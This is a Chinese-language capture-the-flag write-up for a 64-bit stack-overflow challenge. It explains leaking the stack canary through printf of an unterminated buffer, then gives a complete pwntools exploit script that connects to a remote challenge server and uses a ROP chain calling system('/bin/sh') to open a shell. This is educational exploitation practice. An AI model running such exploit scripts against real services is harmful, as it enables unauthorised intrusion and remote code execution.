checksec:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
main函数如下:
int __cdecl main(int argc, const char **argv, const char **envp) { char buf; // [rsp+10h] [rbp-240h] char v5; // [rsp+40h] [rbp-210h] unsigned __int64 v6; // [rsp+248h] [rbp-8h] v6 = __readfsqword(0x28u); init(); write(1, "Welcome!\n", 0x10uLL); write(1, "Please leave your name(Within 36 Length):", 0x29uLL); read(0, &buf, 0x300uLL); printf("Hello %s\n", &buf, argv); write(1, "Please leave a message(Within 0x200 Length):", 0x2CuLL); read(0, &v5, 0x300uLL); printf("your message is :%s \nBye~", &v5); return 0; }
有很明显的栈溢出,但是因为开启了保护,无法直接利用,必须要把canary的值泄露出来。
另外,hint()中有个可调用的system函数:

canary的值在rbp-8里:

将canary低位的 ‘\x00’ 给覆盖掉让它泄露出来即可。
用sendline()
末尾自动添加的换行符把00替换成0a,由于不存在00截断,可以泄露canary。
from pwn import * elf = ELF('./pwn4_') local = 0 if local == 1: io = process('./pwn4_') gdb.attach(io,'b * 0x4008EA') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: io = remote('114.67.246.176',14415) #libc = ELF('./libc6_2.27-3ubuntu1_amd64.so') ret = 0x0000000000400611 pop_rdi_ret = 0x0000000000400963 system_addr = 0x40080C binsh = 0x0000000000601068 payload = 'a'*(0x240-8-len('shawroot'))+'shawroot' io.recvuntil("36 Length):") io.sendline(payload) io.recvuntil("shawroot\n") canary_addr = u64('\x00'+io.recv(7)) print(hex(canary_addr)) io.recvuntil("0x200 Length):") payload2 = 'a'*(0x210-8)+p64(canary_addr)+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(binsh)+p64(system_addr) io.sendline(payload2) io.interactive()